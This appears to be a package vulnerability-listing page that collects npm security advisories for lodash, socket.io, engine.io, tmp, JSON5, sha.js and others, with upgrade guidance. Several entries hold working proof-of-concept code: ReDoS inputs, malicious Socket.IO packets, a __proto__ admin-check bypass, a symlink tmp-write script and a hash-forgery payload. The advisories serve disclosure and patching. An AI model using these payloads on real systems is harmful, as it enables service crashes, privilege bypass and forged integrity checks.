All the vulnerabilities related to the version 1.0.0 of the package
Cross-site Scripting in karma
karma prior to version 6.3.14 contains a cross-site scripting vulnerability.
Open redirect in karma
Karma before 6.3.16 is vulnerable to Open Redirect due to missing validation of the return_url query parameter.
Command Injection in lodash
lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function.
Prototype Pollution in lodash
Versions of lodash before 4.17.11 are vulnerable to prototype pollution.
The vulnerable functions are 'defaultsDeep', 'merge', and 'mergeWith' which allow a malicious user to modify the prototype of Object via {constructor: {prototype: {...}}} causing the addition or modification of an existing property that will exist on all objects.
Update to version 4.17.11 or later.
Prototype Pollution in lodash
Versions of lodash before 4.17.5 are vulnerable to prototype pollution.
The vulnerable functions are 'defaultsDeep', 'merge', and 'mergeWith' which allow a malicious user to modify the prototype of Object via __proto__ causing the addition or modification of an existing property that will exist on all objects.
Update to version 4.17.5 or later.
Prototype Pollution in lodash
Versions of lodash before 4.17.12 are vulnerable to Prototype Pollution. The function defaultsDeep allows a malicious user to modify the prototype of Object via {constructor: {prototype: {...}}} causing the addition or modification of an existing property that will exist on all objects.
Update to version 4.17.12 or later.
Prototype Pollution in lodash
Versions of lodash prior to 4.17.19 are vulnerable to Prototype Pollution. The functions pick, set, setWith, update, updateWith, and zipObjectDeep allow a malicious user to modify the prototype of Object if the property identifiers are user-supplied. Being affected by this issue requires manipulating objects based on user-provided property values or arrays.
This vulnerability causes the addition or modification of an existing property that will exist on all objects and may lead to Denial of Service or Code Execution under specific circumstances.
Incorrect Default Permissions in log4js
Default file permissions for log files created by the file, fileSync and dateFile appenders are world-readable (in unix). This could cause problems if log files contain sensitive information. This would affect any users that have not supplied their own permissions for the files via the mode parameter in the config.
Fixed by:
Released to NPM in log4js@6.4.0
Every version of log4js published allows passing the mode parameter to the configuration of file appenders, see the documentation for details.
Thanks to ranjit-git for raising the issue, and to @lamweili for fixing the problem.
If you have any questions or comments about this advisory:
semver vulnerable to Regular Expression Denial of Service
Versions of the package semver before 7.5.2 on the 7.x branch, before 6.3.1 on the 6.x branch, and all other versions before 5.7.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range.
Regular Expression Denial of Service (ReDoS) in micromatch
The NPM package micromatch prior to version 4.0.8 is vulnerable to Regular Expression Denial of Service (ReDoS). The vulnerability occurs in micromatch.braces() in index.js because the pattern .* will greedily match anything. By passing a malicious payload, the pattern matching will keep backtracking to the input while it doesn't find the closing bracket. As the input size increases, the consumption time will also increase until it causes the application to hang or slow down. There was a merged fix but further testing shows the issue persisted prior to https://github.com/micromatch/micromatch/pull/266. This issue should be mitigated by using a safe pattern that won't start backtracking the regular expression due to greedy matching.
Regular Expression Denial of Service in braces
Versions of braces prior to 2.3.1 are vulnerable to Regular Expression Denial of Service (ReDoS). Untrusted input may cause catastrophic backtracking while matching regular expressions. This can cause the application to be unresponsive leading to Denial of Service.
Upgrade to version 2.3.1 or higher.
Uncontrolled resource consumption in braces
The NPM package braces fails to limit the number of characters it can handle, which could lead to Memory Exhaustion. In lib/parse.js, if a malicious user sends "imbalanced braces" as input, the parsing will enter a loop, which will cause the program to start allocating heap memory without freeing it at any moment of the loop. Eventually, the JavaScript heap limit is reached, and the program will crash.
Prototype Pollution in minimist
Affected versions of minimist are vulnerable to prototype pollution. Arguments are not properly sanitized, allowing an attacker to modify the prototype of Object, causing the addition or modification of an existing property that will exist on all objects.
Parsing the argument --__proto__.y=Polluted adds a y property with value Polluted to all objects. The argument --__proto__=Polluted raises and uncaught error and crashes the application.
This is exploitable if attackers have control over the arguments being passed to minimist.
Upgrade to versions 0.2.1, 1.2.3 or later.
Prototype Pollution in minimist
Minimist prior to 1.2.6 and 0.2.4 is vulnerable to Prototype Pollution via file index.js, function setKey() (lines 69-95).
socket.io has an unhandled 'error' event
A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process.
node:events:502
throw err; // Unhandled 'error' event
^
Error [ERR_UNHANDLED_ERROR]: Unhandled error. (undefined)
at new NodeError (node:internal/errors:405:5)
at Socket.emit (node:events:500:17)
at /myapp/node_modules/socket.io/lib/socket.js:531:14
at process.processTicksAndRejections (node:internal/process/task_queues:77:11) {
code: 'ERR_UNHANDLED_ERROR',
context: undefined
}
| Version range | Needs minor update? |
|------------------|------------------------------------------------|
| 4.6.2...latest | Nothing to do |
| 3.0.0...4.6.1 | Please upgrade to socket.io@4.6.2 (at least) |
| 2.3.0...2.5.0 | Please upgrade to socket.io@2.5.1 |
This issue is fixed by https://github.com/socketio/socket.io/commit/15af22fc22bc6030fcead322c106f07640336115, included in socket.io@4.6.2 (released in May 2023).
The fix was backported in the 2.x branch today: https://github.com/socketio/socket.io/commit/d30630ba10562bf987f4d2b42440fc41a828119c
As a workaround for the affected versions of the socket.io package, you can attach a listener for the "error" event:
io.on("connection", (socket) => {
socket.on("error", () => {
// ...
});
});
If you have any questions or comments about this advisory:
Thanks a lot to Paul Taylor for the responsible disclosure.
CORS misconfiguration in socket.io
The package socket.io before 2.4.0 are vulnerable to Insecure Defaults due to CORS Misconfiguration. All domains are whitelisted by default.
Resource exhaustion in engine.io
Engine.IO before 4.0.0 and 3.6.0 allows attackers to cause a denial of service (resource consumption) via a POST request to the long polling transport.
Uncaught exception in engine.io
A specially crafted HTTP request can trigger an uncaught exception on the Engine.IO server, thus killing the Node.js process.
events.js:292
throw er; // Unhandled 'error' event
^
Error: read ECONNRESET
at TCP.onStreamRead (internal/stream_base_commons.js:209:20)
Emitted 'error' event on Socket instance at:
at emitErrorNT (internal/streams/destroy.js:106:8)
at emitErrorCloseNT (internal/streams/destroy.js:74:3)
at processTicksAndRejections (internal/process/task_queues.js:80:21) {
errno: -104,
code: 'ECONNRESET',
syscall: 'read'
}
This impacts all the users of the engine.io package, including those who uses depending packages like socket.io.
A fix has been released today (2022/11/20):
| Version range | Fixed version |
|-------------------|---------------|
| engine.io@3.x.y | 3.6.1 |
| engine.io@6.x.y | 6.2.1 |
For socket.io users:
| Version range | engine.io version | Needs minor update? |
|-----------------------------|---------------------|--------------------------------------------------------------------------------------------------------|
| socket.io@4.5.x | ~6.2.0 | npm audit fix should be sufficient |
| socket.io@4.4.x | ~6.1.0 | Please upgrade to socket.io@4.5.x |
| socket.io@4.3.x | ~6.0.0 | Please upgrade to socket.io@4.5.x |
| socket.io@4.2.x | ~5.2.0 | Please upgrade to socket.io@4.5.x |
| socket.io@4.1.x | ~5.1.1 | Please upgrade to socket.io@4.5.x |
| socket.io@4.0.x | ~5.0.0 | Please upgrade to socket.io@4.5.x |
| socket.io@3.1.x | ~4.1.0 | Please upgrade to socket.io@4.5.x (see here) |
| socket.io@3.0.x | ~4.0.0 | Please upgrade to socket.io@4.5.x (see here) |
| socket.io@2.5.0 | ~3.6.0 | npm audit fix should be sufficient |
| socket.io@2.4.x and below | ~3.5.0 | Please upgrade to socket.io@2.5.0 |
There is no known workaround except upgrading to a safe version.
If you have any questions or comments about this advisory:
engine.ioThanks to Jonathan Neve for the responsible disclosure.
cookie accepts cookie name, path, and domain with out of bounds characters
The cookie name could be used to set other fields of the cookie, resulting in an unexpected cookie value. For example, serialize("userName=<script>alert('XSS3')</script>; Max-Age=2592000; a", value) would result in "userName=<script>alert('XSS3')</script>; Max-Age=2592000; a=test", setting userName cookie to <script> and ignoring value.
A similar escape can be used for path and domain, which could be abused to alter other fields of the cookie.
Upgrade to 0.7.0, which updates the validation for name, path, and domain.
Avoid passing untrusted or arbitrary values for these fields, ensure they are set by the application instead of user input.
parse-uri Regular expression Denial of Service (ReDoS)
An issue in parse-uri v1.0.9 allows attackers to cause a Regular expression Denial of Service (ReDoS) via a crafted URL.
async function exploit() {
const parseuri = require("parse-uri");
// This input is designed to cause excessive backtracking in the regex
const craftedInput = 'http://example.com/' + 'a'.repeat(30000) + '?key=value';
const result = await parseuri(craftedInput);
}
await exploit();
Regular Expression Denial of Service in parsejson
Affected versions of parsejson are vulnerable to a regular expression denial of service when parsing untrusted user input.
The parsejson package has not been functionally updated since it was initially released.
Additionally, it provides functionality which is natively included in Node.js, and therefore the native JSON.parse() should be used, for both performance and security reasons.
Insufficient validation when decoding a Socket.IO packet
A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process.
TypeError: Cannot convert object to primitive value
at Socket.emit (node:events:507:25)
at .../node_modules/socket.io/lib/socket.js:531:14
A fix has been released today (2023/05/22):
socket.io-parser@4.2.3socket.io-parser@3.4.3Another fix has been released for the 3.3.x branch:
| socket.io version | socket.io-parser version | Needs minor update? |
|---------------------|---------------------------------------------------------------------------------------------------------|--------------------------------------|
| 4.5.2...latest | ~4.2.0 (ref) | npm audit fix should be sufficient |
| 4.1.3...4.5.1 | ~4.1.1 (ref) | Please upgrade to socket.io@4.6.x |
| 3.0.5...4.1.2 | ~4.0.3 (ref) | Please upgrade to socket.io@4.6.x |
| 3.0.0...3.0.4 | ~4.0.1 (ref) | Please upgrade to socket.io@4.6.x |
| 2.3.0...2.5.0 | ~3.4.0 (ref) | npm audit fix should be sufficient |
There is no known workaround except upgrading to a safe version.
If you have any questions or comments about this advisory:
Thanks to @rafax00 for the responsible disclosure.
Insufficient validation when decoding a Socket.IO packet
Due to improper type validation in the socket.io-parser library (which is used by the socket.io and socket.io-client packages to encode and decode Socket.IO packets), it is possible to overwrite the _placeholder object which allows an attacker to place references to functions at arbitrary places in the resulting query object.
Example:
const decoder = new Decoder();
decoder.on("decoded", (packet) => {
console.log(packet.data); // prints [ 'hello', [Function: splice] ]
})
decoder.add('51-["hello",{"_placeholder":true,"num":"splice"}]');
decoder.add(Buffer.from("world"));
This bubbles up in the socket.io package:
io.on("connection", (socket) => {
socket.on("hello", (val) => {
// here, "val" could be a function instead of a buffer
});
});
:warning: IMPORTANT NOTE :warning:
You need to make sure that the payload that you received from the client is actually a Buffer object:
io.on("connection", (socket) => {
socket.on("hello", (val) => {
if (!Buffer.isBuffer(val)) {
socket.disconnect();
return;
}
// ...
});
});
If that's already the case, then you are not impacted by this issue, and there is no way an attacker could make your server crash (or escalate privileges, ...).
Example of values that could be sent by a malicious user:
Sample packet: 451-["hello",{"_placeholder":true,"num":10}]
io.on("connection", (socket) => {
socket.on("hello", (val) => {
// val is `undefined`
});
});
undefinedSample packet: 451-["hello",{"_placeholder":true,"num":undefined}]
io.on("connection", (socket) => {
socket.on("hello", (val) => {
// val is `undefined`
});
});
Array, like "push"Sample packet: 451-["hello",{"_placeholder":true,"num":"push"}]
io.on("connection", (socket) => {
socket.on("hello", (val) => {
// val is a reference to the "push" function
});
});
Object, like "hasOwnProperty"Sample packet: 451-["hello",{"_placeholder":true,"num":"hasOwnProperty"}]
io.on("connection", (socket) => {
socket.on("hello", (val) => {
// val is a reference to the "hasOwnProperty" function
});
});
This should be fixed by:
socket.io-parser@4.2.1socket.io-parser@4.0.5socket.io-parser@3.4.2socket.io-parser@3.3.3socket.io package| socket.io version | socket.io-parser version | Covered? |
|---------------------|---------------------------------------------------------------------------------------------------------|------------------------|
| 4.5.2...latest | ~4.2.0 (ref) | Yes :heavy_check_mark: |
| 4.1.3...4.5.1 | ~4.0.4 (ref) | Yes :heavy_check_mark: |
| 3.0.5...4.1.2 | ~4.0.3 (ref) | Yes :heavy_check_mark: |
| 3.0.0...3.0.4 | ~4.0.1 (ref) | Yes :heavy_check_mark: |
| 2.3.0...2.5.0 | ~3.4.0 (ref) | Yes :heavy_check_mark: |
socket.io-client package| socket.io-client version | socket.io-parser version | Covered? |
|----------------------------|----------------------------------------------------------------------------------------------------------------|------------------------------------|
| 4.5.0...latest | ~4.2.0 (ref) | Yes :heavy_check_mark: |
| 4.3.0...4.4.1 | ~4.1.1 (ref) | No, but the impact is very limited |
| 3.1.0...4.2.0 | ~4.0.4 (ref) | Yes :heavy_check_mark: |
| 3.0.5 | ~4.0.3 (ref) | Yes :heavy_check_mark: |
| 3.0.0...3.0.4 | ~4.0.1 (ref) | Yes :heavy_check_mark: |
| 2.2.0...2.5.0 | ~3.3.0 (ref) | Yes :heavy_check_mark: |
Resource exhaustion in socket.io-parser
The socket.io-parser npm package before versions 3.3.2 and 3.4.1 allows attackers to cause a denial of service (memory consumption) via a large packet because a concatenation approach is used.
useragent Regular Expression Denial of Service vulnerability
Useragent is a user agent parser for Node.js. All versions as of time of publication contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS).
async function exploit() {
const useragent = require(\"useragent\");
// Create a malicious user-agent that leads to excessive backtracking
const maliciousUserAgent = 'Mozilla/5.0 (' + 'X'.repeat(30000) + ') Gecko/20100101 Firefox/77.0';
// Parse the malicious user-agent
const agent = useragent.parse(maliciousUserAgent);
// Call the toString method to trigger the vulnerability
const result = await agent.device.toString();
console.log(result);
}
await exploit();
tmp allows arbitrary temporary file / directory write via symbolic link dir parameter
tmp@0.2.3 is vulnerable to an Arbitrary temporary file / directory write via symbolic link dir parameter.
According to the documentation there are some conditions that must be held:
// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L41-L50
Other breaking changes, i.e.
- template must be relative to tmpdir
- name must be relative to tmpdir
- dir option must be relative to tmpdir //<-- this assumption can be bypassed using symlinks
are still in place.
In order to override the system's tmpdir, you will have to use the newly
introduced tmpdir option.
// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L375
* `dir`: the optional temporary directory that must be relative to the system's default temporary directory.
absolute paths are fine as long as they point to a location under the system's default temporary directory.
Any directories along the so specified path must exist, otherwise a ENOENT error will be thrown upon access,
as tmp will not check the availability of the path, nor will it establish the requested path for you.
Related issue: https://github.com/raszi/node-tmp/issues/207.
The issue occurs because _resolvePath does not properly handle symbolic link when resolving paths:
// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L573-L579
function _resolvePath(name, tmpDir) {
if (name.startsWith(tmpDir)) {
return path.resolve(name);
} else {
return path.resolve(path.join(tmpDir, name));
}
}
If the dir parameter points to a symlink that resolves to a folder outside the tmpDir, it's possible to bypass the _assertIsRelative check used in _assertAndSanitizeOptions:
// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L590-L609
function _assertIsRelative(name, option, tmpDir) {
if (option === 'name') {
// assert that name is not absolute and does not contain a path
if (path.isAbsolute(name))
throw new Error(`${option} option must not contain an absolute path, found "${name}".`);
// must not fail on valid .<name> or ..<name> or similar such constructs
let basename = path.basename(name);
if (basename === '..' || basename === '.' || basename !== name)
throw new Error(`${option} option must not contain a path, found "${name}".`);
}
else { // if (option === 'dir' || option === 'template') {
// assert that dir or template are relative to tmpDir
if (path.isAbsolute(name) && !name.startsWith(tmpDir)) {
throw new Error(`${option} option must be relative to "${tmpDir}", found "${name}".`);
}
let resolvedPath = _resolvePath(name, tmpDir); //<---
if (!resolvedPath.startsWith(tmpDir))
throw new Error(`${option} option must be relative to "${tmpDir}", found "${resolvedPath}".`);
}
}
The following PoC demonstrates how writing a tmp file on a folder outside the tmpDir is possible.
Tested on a Linux machine.
tmpDir that points to a directory outside of itmkdir $HOME/mydir1
ln -s $HOME/mydir1 ${TMPDIR:-/tmp}/evil-dir
ls -lha $HOME/mydir1 | grep "tmp-"
node main.js
File: /tmp/evil-dir/tmp-26821-Vw87SLRaBIlf
test 1: ENOENT: no such file or directory, open '/tmp/mydir1/tmp-[random-id]'
test 2: dir option must be relative to "/tmp", found "/foo".
test 3: dir option must be relative to "/tmp", found "/home/user/mydir1".
$HOME/mydir1 (outside the tmpDir):ls -lha $HOME/mydir1 | grep "tmp-"
-rw------- 1 user user 0 Apr X XX:XX tmp-[random-id]
main.js// npm i tmp@0.2.3
const tmp = require('tmp');
const tmpobj = tmp.fileSync({ 'dir': 'evil-dir'});
console.log('File: ', tmpobj.name);
try {
tmp.fileSync({ 'dir': 'mydir1'});
} catch (err) {
console.log('test 1:', err.message)
}
try {
tmp.fileSync({ 'dir': '/foo'});
} catch (err) {
console.log('test 2:', err.message)
}
try {
const fs = require('node:fs');
const resolved = fs.realpathSync('/tmp/evil-dir');
tmp.fileSync({ 'dir': resolved});
} catch (err) {
console.log('test 3:', err.message)
}
A Potential fix could be to call fs.realpathSync (or similar) that resolves also symbolic links.
function _resolvePath(name, tmpDir) {
let resolvedPath;
if (name.startsWith(tmpDir)) {
resolvedPath = path.resolve(name);
} else {
resolvedPath = path.resolve(path.join(tmpDir, name));
}
return fs.realpathSync(resolvedPath);
}
Arbitrary temporary file / directory write via symlink
Prototype pollution in webpack loader-utils
Prototype pollution vulnerability in function parseQuery in parseQuery.js in webpack loader-utils prior to version 2.0.3 via the name variable in parseQuery.js.
Prototype Pollution in JSON5 via Parse Method
The parse method of the JSON5 library before and including version 2.2.1 does not restrict parsing of keys named __proto__, allowing specially crafted strings to pollute the prototype of the resulting object.
This vulnerability pollutes the prototype of the object returned by JSON5.parse and not the global Object prototype, which is the commonly understood definition of Prototype Pollution. However, polluting the prototype of a single object can have significant security impact for an application if the object is later used in trusted operations.
This vulnerability could allow an attacker to set arbitrary and unexpected keys on the object returned from JSON5.parse. The actual impact will depend on how applications utilize the returned object and how they filter unwanted keys, but could include denial of service, cross-site scripting, elevation of privilege, and in extreme cases, remote code execution.
This vulnerability is patched in json5 v2.2.2 and later. A patch has also been backported for json5 v1 in versions v1.0.2 and later.
Suppose a developer wants to allow users and admins to perform some risky operation, but they want to restrict what non-admins can do. To accomplish this, they accept a JSON blob from the user, parse it using JSON5.parse, confirm that the provided data does not set some sensitive keys, and then performs the risky operation using the validated data:
const JSON5 = require('json5');
const doSomethingDangerous = (props) => {
if (props.isAdmin) {
console.log('Doing dangerous thing as admin.');
} else {
console.log('Doing dangerous thing as user.');
}
};
const secCheckKeysSet = (obj, searchKeys) => {
let searchKeyFound = false;
Object.keys(obj).forEach((key) => {
if (searchKeys.indexOf(key) > -1) {
searchKeyFound = true;
}
});
return searchKeyFound;
};
const props = JSON5.parse('{"foo": "bar"}');
if (!secCheckKeysSet(props, ['isAdmin', 'isMod'])) {
doSomethingDangerous(props); // "Doing dangerous thing as user."
} else {
throw new Error('Forbidden...');
}
If the user attempts to set the isAdmin key, their request will be rejected:
const props = JSON5.parse('{"foo": "bar", "isAdmin": true}');
if (!secCheckKeysSet(props, ['isAdmin', 'isMod'])) {
doSomethingDangerous(props);
} else {
throw new Error('Forbidden...'); // Error: Forbidden...
}
However, users can instead set the __proto__ key to {"isAdmin": true}. JSON5 will parse this key and will set the isAdmin key on the prototype of the returned object, allowing the user to bypass the security check and run their request as an admin:
const props = JSON5.parse('{"foo": "bar", "__proto__": {"isAdmin": true}}');
if (!secCheckKeysSet(props, ['isAdmin', 'isMod'])) {
doSomethingDangerous(props); // "Doing dangerous thing as admin."
} else {
throw new Error('Forbidden...');
}
sha.js is missing type checks leading to hash rewind and passing on crafted data
This is the same as GHSA-cpq7-6gpm-g9rc but just for sha.js, as it has its own implementation.
Missing input type checks can allow types other than a well-formed Buffer or string, resulting in invalid values, hanging and rewinding the hash state (including turning a tagged hash into an untagged hash), or other generally undefined behaviour.
See PoC
const forgeHash = (data, payload) => JSON.stringify([payload, { length: -payload.length}, [...data]])
const sha = require('sha.js')
const { randomBytes } = require('crypto')
const sha256 = (...messages) => {
const hash = sha('sha256')
messages.forEach((m) => hash.update(m))
return hash.digest('hex')
}
const validMessage = [randomBytes(32), randomBytes(32), randomBytes(32)] // whatever
const payload = forgeHash(Buffer.concat(validMessage), 'Hashed input means safe')
const receivedMessage = JSON.parse(payload) // e.g. over network, whatever
console.log(sha256(...validMessage))
console.log(sha256(...receivedMessage))
console.log(receivedMessage[0])
Output:
638d5bf3ca5d1decf7b78029f1c4a58558143d62d0848d71e27b2a6ff312d7c4
638d5bf3ca5d1decf7b78029f1c4a58558143d62d0848d71e27b2a6ff312d7c4
Hashed input means safe
Or just:
> require('sha.js')('sha256').update('foo').digest('hex')
'2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae'
> require('sha.js')('sha256').update('fooabc').update({length:-3}).digest('hex')
'2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae'
{length: -x}. This is behind the PoC above, also this way an attacker can turn a tagged hash in cryptographic libraries into an untagged hash.{ length: buf.length, ...buf, 0: buf[0] + 256 }
This will result in the same hash as of buf, but can be treated by other code differently (e.g. bn.js){length:'1e99'}